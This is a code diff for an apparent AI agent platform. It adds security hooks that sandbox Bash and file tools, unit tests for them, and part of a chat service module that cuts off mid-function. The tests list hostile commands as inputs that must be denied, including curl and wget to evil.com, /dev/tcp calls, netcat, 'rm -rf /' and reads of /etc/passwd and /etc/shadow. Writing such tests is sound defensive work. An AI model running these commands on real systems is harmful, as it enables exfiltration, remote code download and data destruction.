# Skip env var assignments (VAR=value)
|
||||||
|
if "=" in token and not token.startswith("-"):
|
||||||
|
continue
|
||||||
|
cmd_name = os.path.basename(token)
|
||||||
|
if cmd_name not in ALLOWED_BASH_COMMANDS:
|
||||||
|
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
|
||||||
|
logger.warning(f"Blocked Bash command: {cmd_name}")
|
||||||
|
return _deny(
|
||||||
|
f"Command '{cmd_name}' is not allowed. "
|
||||||
|
f"Allowed commands: {allowed}"
|
||||||
|
)
|
||||||
|
expect_command = False
|
||||||
|
|
||||||
|
# Validate absolute file paths stay within workspace
|
||||||
|
if sdk_cwd:
|
||||||
|
norm_cwd = os.path.normpath(sdk_cwd)
|
||||||
|
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
|
||||||
|
for token in tokens:
|
||||||
|
if not token.startswith("/"):
|
||||||
|
continue
|
||||||
|
resolved = os.path.normpath(token)
|
||||||
|
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
|
||||||
|
continue
|
||||||
|
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
|
||||||
|
continue
|
||||||
|
logger.warning(f"Blocked Bash path outside workspace: {token}")
|
||||||
|
return _deny(
|
||||||
|
f"Bash can only access files within the workspace directory. "
|
||||||
|
f"Path '{token}' is outside the workspace."
|
||||||
|
)
|
||||||
|
|
||||||
|
return {}
|
||||||
|
|
||||||
|
|
||||||
|
def _validate_tool_access(
|
||||||
|
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
|
||||||
|
) -> dict[str, Any]:
|
||||||
|
"""Validate that a tool call is allowed.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Empty dict to allow, or dict with hookSpecificOutput to deny
|
||||||
|
"""
|
||||||
|
# Block forbidden tools
|
||||||
|
if tool_name in BLOCKED_TOOLS:
|
||||||
|
logger.warning(f"Blocked tool access attempt: {tool_name}")
|
||||||
|
return _deny(
|
||||||
|
f"Tool '{tool_name}' is not available. "
|
||||||
|
"Use the CoPilot-specific tools instead."
|
||||||
|
)
|
||||||
|
|
||||||
|
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
|
||||||
|
if tool_name in SANDBOXED_BASH_TOOLS:
|
||||||
|
return _validate_bash_command(tool_input, sdk_cwd)
|
||||||
|
|
||||||
|
# Workspace-scoped tools: allowed only within the SDK workspace directory
|
||||||
|
if tool_name in WORKSPACE_SCOPED_TOOLS:
|
||||||
|
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
|
||||||
|
|
||||||
|
# Check for dangerous patterns in tool input
|
||||||
|
# Use json.dumps for predictable format (str() produces Python repr)
|
||||||
|
input_str = json.dumps(tool_input) if tool_input else ""
|
||||||
|
|
||||||
|
for pattern in DANGEROUS_PATTERNS:
|
||||||
|
if re.search(pattern, input_str, re.IGNORECASE):
|
||||||
|
logger.warning(
|
||||||
|
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
|
||||||
|
)
|
||||||
|
return _deny("Input contains blocked pattern")
|
||||||
|
|
||||||
|
return {}
|
||||||
|
|
||||||
|
|
||||||
|
def _validate_user_isolation(
|
||||||
|
tool_name: str, tool_input: dict[str, Any], user_id: str | None
|
||||||
|
) -> dict[str, Any]:
|
||||||
|
"""Validate that tool calls respect user isolation."""
|
||||||
|
# For workspace file tools, ensure path doesn't escape
|
||||||
|
if "workspace" in tool_name.lower():
|
||||||
|
path = tool_input.get("path", "") or tool_input.get("file_path", "")
|
||||||
|
if path:
|
||||||
|
# Check for path traversal
|
||||||
|
if ".." in path or path.startswith("/"):
|
||||||
|
logger.warning(
|
||||||
|
f"Blocked path traversal attempt: {path} by user {user_id}"
|
||||||
|
)
|
||||||
|
return {
|
||||||
|
"hookSpecificOutput": {
|
||||||
|
"hookEventName": "PreToolUse",
|
||||||
|
"permissionDecision": "deny",
|
||||||
|
"permissionDecisionReason": "Path traversal not allowed",
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return {}
|
||||||
|
|
||||||
|
|
||||||
|
def create_security_hooks(
|
||||||
|
user_id: str | None, sdk_cwd: str | None = None
|
||||||
|
) -> dict[str, Any]:
|
||||||
|
"""Create the security hooks configuration for Claude Agent SDK.
|
||||||
|
|
||||||
|
Includes security validation and observability hooks:
|
||||||
|
- PreToolUse: Security validation before tool execution
|
||||||
|
- PostToolUse: Log successful tool executions
|
||||||
|
- PostToolUseFailure: Log and handle failed tool executions
|
||||||
|
- PreCompact: Log context compaction events (SDK handles compaction automatically)
|
||||||
|
|
||||||
|
Args:
|
||||||
|
user_id: Current user ID for isolation validation
|
||||||
|
sdk_cwd: SDK working directory for workspace-scoped tool validation
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Hooks configuration dict for ClaudeAgentOptions
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
from claude_agent_sdk import HookMatcher
|
||||||
|
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
|
||||||
|
|
||||||
|
async def pre_tool_use_hook(
|
||||||
|
input_data: HookInput,
|
||||||
|
tool_use_id: str | None,
|
||||||
|
context: HookContext,
|
||||||
|
) -> SyncHookJSONOutput:
|
||||||
|
"""Combined pre-tool-use validation hook."""
|
||||||
|
_ = context # unused but required by signature
|
||||||
|
tool_name = cast(str, input_data.get("tool_name", ""))
|
||||||
|
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
|
||||||
|
|
||||||
|
# Strip MCP prefix for consistent validation
|
||||||
|
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
|
||||||
|
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
|
||||||
|
|
||||||
|
# Only block non-CoPilot tools; our MCP-registered tools
|
||||||
|
# (including Read for oversized results) are already sandboxed.
|
||||||
|
if not is_copilot_tool:
|
||||||
|
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
|
||||||
|
if result:
|
||||||
|
return cast(SyncHookJSONOutput, result)
|
||||||
|
|
||||||
|
# Validate user isolation
|
||||||
|
result = _validate_user_isolation(clean_name, tool_input, user_id)
|
||||||
|
if result:
|
||||||
|
return cast(SyncHookJSONOutput, result)
|
||||||
|
|
||||||
|
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
|
||||||
|
return cast(SyncHookJSONOutput, {})
|
||||||
|
|
||||||
|
async def post_tool_use_hook(
|
||||||
|
input_data: HookInput,
|
||||||
|
tool_use_id: str | None,
|
||||||
|
context: HookContext,
|
||||||
|
) -> SyncHookJSONOutput:
|
||||||
|
"""Log successful tool executions for observability."""
|
||||||
|
_ = context
|
||||||
|
tool_name = cast(str, input_data.get("tool_name", ""))
|
||||||
|
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
|
||||||
|
return cast(SyncHookJSONOutput, {})
|
||||||
|
|
||||||
|
async def post_tool_failure_hook(
|
||||||
|
input_data: HookInput,
|
||||||
|
tool_use_id: str | None,
|
||||||
|
context: HookContext,
|
||||||
|
) -> SyncHookJSONOutput:
|
||||||
|
"""Log failed tool executions for debugging."""
|
||||||
|
_ = context
|
||||||
|
tool_name = cast(str, input_data.get("tool_name", ""))
|
||||||
|
error = input_data.get("error", "Unknown error")
|
||||||
|
logger.warning(
|
||||||
|
f"[SDK] Tool failed: {tool_name}, error={error}, "
|
||||||
|
f"user={user_id}, tool_use_id={tool_use_id}"
|
||||||
|
)
|
||||||
|
return cast(SyncHookJSONOutput, {})
|
||||||
|
|
||||||
|
async def pre_compact_hook(
|
||||||
|
input_data: HookInput,
|
||||||
|
tool_use_id: str | None,
|
||||||
|
context: HookContext,
|
||||||
|
) -> SyncHookJSONOutput:
|
||||||
|
"""Log when SDK triggers context compaction.
|
||||||
|
|
||||||
|
The SDK automatically compacts conversation history when it grows too large.
|
||||||
|
This hook provides visibility into when compaction happens.
|
||||||
|
"""
|
||||||
|
_ = context, tool_use_id
|
||||||
|
trigger = input_data.get("trigger", "auto")
|
||||||
|
logger.info(
|
||||||
|
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
|
||||||
|
)
|
||||||
|
return cast(SyncHookJSONOutput, {})
|
||||||
|
|
||||||
|
return {
|
||||||
|
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
|
||||||
|
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
|
||||||
|
"PostToolUseFailure": [
|
||||||
|
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
|
||||||
|
],
|
||||||
|
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
|
||||||
|
}
|
||||||
|
except ImportError:
|
||||||
|
# Fallback for when SDK isn't available - return empty hooks
|
||||||
|
logger.warning("claude-agent-sdk not available, security hooks disabled")
|
||||||
|
return {}
|
||||||
@@ -0,0 +1,258 @@
|
|||||||
|
"""Unit tests for SDK security hooks."""
|
||||||
|
|
||||||
|
import os
|
||||||
|
|
||||||
|
from .security_hooks import _validate_tool_access, _validate_user_isolation
|
||||||
|
|
||||||
|
SDK_CWD = "/tmp/copilot-abc123"
|
||||||
|
|
||||||
|
|
||||||
|
def _is_denied(result: dict) -> bool:
|
||||||
|
hook = result.get("hookSpecificOutput", {})
|
||||||
|
return hook.get("permissionDecision") == "deny"
|
||||||
|
|
||||||
|
|
||||||
|
# -- Blocked tools -----------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_blocked_tools_denied():
|
||||||
|
for tool in ("bash", "shell", "exec", "terminal", "command"):
|
||||||
|
result = _validate_tool_access(tool, {})
|
||||||
|
assert _is_denied(result), f"{tool} should be blocked"
|
||||||
|
|
||||||
|
|
||||||
|
def test_unknown_tool_allowed():
|
||||||
|
result = _validate_tool_access("SomeCustomTool", {})
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
# -- Workspace-scoped tools --------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_read_within_workspace_allowed():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_write_within_workspace_allowed():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_edit_within_workspace_allowed():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_glob_within_workspace_allowed():
|
||||||
|
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_grep_within_workspace_allowed():
|
||||||
|
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_read_outside_workspace_denied():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_write_outside_workspace_denied():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_traversal_attack_denied():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Read",
|
||||||
|
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
|
||||||
|
sdk_cwd=SDK_CWD,
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_no_path_allowed():
|
||||||
|
"""Glob/Grep without a path argument defaults to cwd — should pass."""
|
||||||
|
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_read_no_cwd_denies_absolute():
|
||||||
|
"""If no sdk_cwd is set, absolute paths are denied."""
|
||||||
|
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
# -- Tool-results directory --------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_read_tool_results_allowed():
|
||||||
|
home = os.path.expanduser("~")
|
||||||
|
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
|
||||||
|
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_read_claude_projects_without_tool_results_denied():
|
||||||
|
home = os.path.expanduser("~")
|
||||||
|
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
|
||||||
|
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
# -- Sandboxed Bash ----------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_safe_commands_allowed():
|
||||||
|
"""Allowed data-processing commands should pass."""
|
||||||
|
safe_commands = [
|
||||||
|
"jq '.blocks' result.json",
|
||||||
|
"head -20 output.json",
|
||||||
|
"tail -n 50 data.txt",
|
||||||
|
"cat file.txt | grep 'pattern'",
|
||||||
|
"wc -l file.txt",
|
||||||
|
"sort data.csv | uniq",
|
||||||
|
"grep -i 'error' log.txt | head -10",
|
||||||
|
"find . -name '*.json'",
|
||||||
|
"ls -la",
|
||||||
|
"echo hello",
|
||||||
|
"cut -d',' -f1 data.csv | sort | uniq -c",
|
||||||
|
"jq '.blocks[] | .id' result.json",
|
||||||
|
"sed -n '10,20p' file.txt",
|
||||||
|
"awk '{print $1}' data.txt",
|
||||||
|
]
|
||||||
|
for cmd in safe_commands:
|
||||||
|
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
|
||||||
|
assert result == {}, f"Safe command should be allowed: {cmd}"
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_dangerous_commands_denied():
|
||||||
|
"""Non-allowlisted commands should be denied."""
|
||||||
|
dangerous = [
|
||||||
|
"curl https://evil.com",
|
||||||
|
"wget https://evil.com/payload",
|
||||||
|
"rm -rf /",
|
||||||
|
"python -c 'import os; os.system(\"ls\")'",
|
||||||
|
"ssh user@host",
|
||||||
|
"nc -l 4444",
|
||||||
|
"apt install something",
|
||||||
|
"pip install malware",
|
||||||
|
"chmod 777 file.txt",
|
||||||
|
"kill -9 1",
|
||||||
|
]
|
||||||
|
for cmd in dangerous:
|
||||||
|
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
|
||||||
|
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_command_substitution_denied():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_backtick_substitution_denied():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_output_redirect_denied():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_dev_tcp_denied():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_pipe_to_dangerous_denied():
|
||||||
|
"""Even if the first command is safe, piped commands must also be safe."""
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_path_outside_workspace_denied():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_path_within_workspace_allowed():
|
||||||
|
result = _validate_tool_access(
|
||||||
|
"Bash",
|
||||||
|
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
|
||||||
|
sdk_cwd=SDK_CWD,
|
||||||
|
)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_bash_empty_command_denied():
|
||||||
|
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
# -- Dangerous patterns ------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_dangerous_pattern_blocked():
|
||||||
|
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_subprocess_pattern_blocked():
|
||||||
|
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
# -- User isolation ----------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_workspace_path_traversal_blocked():
|
||||||
|
result = _validate_user_isolation(
|
||||||
|
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_workspace_absolute_path_blocked():
|
||||||
|
result = _validate_user_isolation(
|
||||||
|
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
|
||||||
|
)
|
||||||
|
assert _is_denied(result)
|
||||||
|
|
||||||
|
|
||||||
|
def test_workspace_normal_path_allowed():
|
||||||
|
result = _validate_user_isolation(
|
||||||
|
"workspace_read", {"path": "src/main.py"}, user_id="user-1"
|
||||||
|
)
|
||||||
|
assert result == {}
|
||||||
|
|
||||||
|
|
||||||
|
def test_non_workspace_tool_passes_isolation():
|
||||||
|
result = _validate_user_isolation(
|
||||||
|
"find_agent", {"query": "email"}, user_id="user-1"
|
||||||
|
)
|
||||||
|
assert result == {}
|
||||||
@@ -0,0 +1,497 @@
|
|||||||
|
"""Claude Agent SDK service layer for CoPilot chat completions."""
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import uuid
|
||||||
|
from collections.abc import AsyncGenerator
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
from backend.util.exceptions import NotFoundError
|
||||||
|
|
||||||
|
from ..config import ChatConfig
|
||||||
|
from ..model import (
|
||||||
|
ChatMessage,
|
||||||
|
ChatSession,
|
||||||
|
get_chat_session,
|
||||||
|
update_session_title,
|
||||||
|
upsert_chat_session,
|
||||||
|
)
|
||||||
|
from ..response_model import (
|
||||||
|
StreamBaseResponse,
|
||||||
|
StreamError,
|
||||||
|
StreamFinish,
|
||||||
|
StreamStart,
|
||||||
|
StreamTextDelta,
|
||||||
|
StreamToolInputAvailable,
|
||||||
|
StreamToolOutputAvailable,
|
||||||
|
)
|
||||||
|
from ..service import _build_system_prompt, _generate_session_title
|
||||||
|
from ..tracking import track_user_message
|
||||||
|
from .anthropic_fallback import stream_with_anthropic
|
||||||
|
from .response_adapter import SDKResponseAdapter
|
||||||
|
from .security_hooks import create_security_hooks
|
||||||
|
from .tool_adapter import (
|
||||||
|
COPILOT_TOOL_NAMES,
|
||||||
|
create_copilot_mcp_server,
|
||||||
|
set_execution_context,
|
||||||
|
)
|
||||||
|
from .tracing import TracedSession, create_tracing_hooks, merge_hooks
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
config = ChatConfig()
|
||||||
|
|
||||||
|
# Set to hold background tasks to prevent garbage collection
|
||||||
|
_background_tasks: set[asyncio.Task[Any]] = set()
|
||||||
|
|
||||||
|
|
||||||
|
_SDK_CWD_PREFIX = "/tmp/copilot-"
|
||||||
|
|
||||||
|
# Appended to the system prompt to inform the agent about Bash restrictions.
|
||||||
|
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
|
||||||
|
# but it doesn't know about our security hooks' command allowlist for Bash.
|
||||||
|
_SDK_TOOL_SUPPLEMENT = """
|
||||||
|
|
||||||
|
## Bash restrictions
|
||||||
|
|
||||||
|
The Bash tool is restricted to safe, read-only data-processing commands:
|
||||||
|
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
|
||||||
|
echo, diff, base64, and similar utilities.
|
||||||
|
Network commands (curl, wget), destructive commands (rm, chmod), and
|
||||||
|
interpreters (python, node) are NOT available.
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
def _make_sdk_cwd(session_id: str) -> str:
|
||||||
|
"""Create a safe, session-specific working directory path.
|
||||||
|
|
||||||
|
Sanitizes session_id, then validates the resulting path stays under /tmp/
|
||||||
|
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
|
||||||
|
"""
|
||||||
|
# Step 1: Sanitize - only allow alphanumeric and hyphens
|
||||||
|
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
|
||||||
|
if not safe_id:
|
||||||
|
raise ValueError("Session ID is empty after sanitization")
|
||||||
|
|
||||||
|
# Step 2: Construct path with known-safe prefix
|
||||||
|
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
|
||||||
|
|
||||||
|
# Step 3: Validate the path is still under our prefix (prevent traversal)
|
||||||
|
if not cwd.startswith(_SDK_CWD_PREFIX):
|
||||||
|
raise ValueError(f"Session path escaped prefix: {cwd}")
|
||||||
|
|
||||||
|
# Step 4: Additional assertion for defense-in-depth
|
||||||
|
assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
|
||||||
|
|
||||||
|
return cwd
|
||||||
|
|
||||||
|
|
||||||
|
def _cleanup_sdk_tool_results(cwd: str) -> None:
|
||||||
|
"""Remove SDK tool-result files for a specific session working directory.
|
||||||
|
|
||||||
|
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
|
||||||
|
We clean only the specific cwd's results to avoid race conditions between
|
||||||
|
concurrent sessions.
|
||||||
|
|
||||||
|
Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
|
||||||
|
"""
|
||||||
|
import shutil
|
||||||
|
|
||||||
|
# Security check 1: Validate cwd is under the expected prefix
|
||||||
|
normalized = os.path.normpath(cwd)
|
||||||
|
if not normalized.startswith(_SDK_CWD_PREFIX):
|
||||||
|
logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
|
||||||
|
return
|
||||||
|
|
||||||
|
# Security check 2: Ensure no path traversal in the normalized path
|
||||||
|
if ".." in normalized:
|
||||||
|
logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
|
||||||
|
return
|
||||||
|
|
||||||
|
# SDK encodes the cwd path by replacing '/' with '-'
|
||||||
|
encoded_cwd = normalized.replace("/", "-")
|
||||||
|
|
||||||
|
# Construct the project directory path (known-safe home expansion)
|
||||||
|
claude_projects = os.path.expanduser("~/.claude/projects")
|
||||||
|
project_dir = os.path.join(claude_projects, encoded_cwd)
|
||||||
|
|
||||||
|
# Security check 3: Validate project_dir is under ~/.claude/projects
|
||||||
|
project_dir = os.path.normpath(project_dir)
|
||||||
|
if not project_dir.startswith(claude_projects):
|
||||||
|
logger.warning(
|
||||||
|
f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
|
||||||
|
)
|
||||||
|
return
|
||||||
|
|
||||||
|
results_dir = os.path.join(project_dir, "tool-results")
|
||||||
|
if os.path.isdir(results_dir):
|
||||||
|
for filename in os.listdir(results_dir):
|
||||||
|
file_path = os.path.join(results_dir, filename)
|
||||||
|
try:
|
||||||
|
if os.path.isfile(file_path):
|
||||||
|
os.remove(file_path)
|
||||||
|
except OSError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
# Also clean up the temp cwd directory itself
|
||||||
|
try:
|
||||||
|
shutil.rmtree(normalized, ignore_errors=True)
|
||||||
|
except OSError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
async def _compress_conversation_history(
|
||||||
|
session: ChatSession,
|
||||||
|
) -> list[ChatMessage]:
|
||||||
|
"""Compress prior conversation messages if they exceed the token threshold.
|
||||||
|
|
||||||
|
Uses the shared compress_context() from prompt.py which supports:
|
||||||
|
- LLM summarization of old messages (keeps recent ones intact)
|
||||||
|
- Progressive content truncation as fallback
|
||||||
|
- Middle-out deletion as last resort
|
||||||
|
|
||||||
|
Returns the compressed prior messages (everything except the current message).
|
||||||
|
"""
|
||||||
|
prior = session.messages[:-1]
|
||||||
|
if len(prior) < 2:
|
||||||
|
return prior
|
||||||
|
|
||||||
|
from backend.util.prompt import compress_context
|
||||||
|
|
||||||
|
# Convert ChatMessages to dicts for compress_context
|
||||||
|
messages_dict = []
|
||||||
|
for msg in prior:
|
||||||
|
msg_dict: dict[str, Any] = {"role": msg.role}
|
||||||
|
if msg.content:
|
||||||
|
msg_dict["content"] = msg.content
|
||||||
|
if msg.tool_calls:
|
||||||
|
msg_dict["tool_calls"] = msg.tool_calls
|
||||||
|
if msg.tool_call_id:
|
||||||
|
msg_dict["tool_call_id"] = msg.tool_call_id
|
||||||
|
messages_dict.append(msg_dict)
|
||||||
|
|
||||||
|
try:
|
||||||
|
import openai
|
||||||
|
|
||||||
|
async with openai.AsyncOpenAI(
|
||||||
|
api_key=config.api_key, base_url=config.base_url, timeout=30.0
|
||||||
|
) as client:
|
||||||
|
result = await compress_context(
|
||||||
|
messages=messages_dict,
|
||||||
|
model=config.model,
|
||||||
|
client=client,
|
||||||
|
)
|
||||||
|
except Exception as e:
|
||||||
|
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
|
||||||
|
# Fall back to truncation-only (no LLM summarization)
|
||||||
|
result = await compress_context(
|
||||||
|
messages=messages_dict,
|
||||||
|
model=config.model,
|
||||||
|
client=None,
|
||||||
|
)
|
||||||
|
|
||||||
|
if result.was_compacted:
|
||||||
|
logger.info(
|
||||||
|
f"[SDK] Context compacted: {result.original_token_count} -> "
|
||||||
|
f"{result.token_count} tokens "
|
||||||
|
f"({result.messages_summarized} summarized, "
|
||||||
|
f"{result.messages_dropped} dropped)"
|
||||||
|
)
|
||||||
|
# Convert compressed dicts back to ChatMessages
|
||||||
|
return [
|
||||||
|
ChatMessage(
|
||||||
|
role=m["role"],
|
||||||
|
content=m.get("content"),
|
||||||
|
tool_calls=m.get("tool_calls"),
|
||||||
|
tool_call_id=m.get("tool_call_id"),
|
||||||
|
)
|
||||||
|
for m in result.messages
|
||||||
|
]
|
||||||
|
|
||||||
|
return prior
|
||||||
|
|
||||||
|
|
||||||
|
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
|
||||||
|
"""Format conversation messages into a context prefix for the user message.
|
||||||
|
|
||||||
|
Returns a string like:
|
||||||
|
<conversation_history>
|
||||||
|
User: hello
|
||||||
|
You responded: Hi! How can I help?
|
||||||
|
</conversation_history>
|
||||||
|
|
||||||
|
Returns None if there are no messages to format.
|
||||||
|
"""
|
||||||
|
if not messages:
|
||||||
|
return None
|
||||||
|
|
||||||
|
lines: list[str] = []
|
||||||
|
for msg in messages:
|
||||||
|
if not msg.content:
|
||||||
|
continue
|
||||||
|
if msg.role == "user":
|
||||||
|
lines.append(f"User: {msg.content}")
|
||||||
|
elif msg.role == "assistant":
|
||||||
|
lines.append(f"You responded: {msg.content}")
|
||||||
|
# Skip tool messages — they're internal details
|
||||||
|
|
||||||
|
if not lines:
|
||||||
|
return None
|
||||||
|
|
||||||
|
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
|
||||||
|
|
||||||
|
|
||||||
|
async def stream_chat_completion_sdk(
|
||||||
|
session_id: str,
|
||||||
|
message: str | None = None,
|
||||||
|
tool_call_response: str | None = None, # noqa: ARG001
|
||||||
|
is_user_message: bool = True,
|
||||||
|
user_id: str | None = None,
|
||||||
|
retry_count: int = 0, # noqa: ARG001
|
||||||
|
session: ChatSession | None = None,
|
||||||
|
context: dict[str, str] | None = None, # noqa: ARG001
|
||||||
|
) -> AsyncGenerator[StreamBaseResponse, None]:
|
||||||
|
"""Stream chat completion using Claude Agent SDK.
|
||||||
|
|
||||||
|
Drop-in replacement for stream_chat_completion with improved reliability.
|
||||||
|
"""
|
||||||
|
|
||||||
|
if session is None:
|
||||||
|
session = await get_chat_session(session_id, user_id)
|
||||||
|
|
||||||
|
if not session:
|
||||||
|
raise NotFoundError(
|
||||||
|
f"Session {session_id} not found. Please create a new session first."
|
||||||
|
)
|
||||||
|
|
||||||
|
if message:
|
||||||
|
session.messages.append(
|
||||||
|
ChatMessage(
|
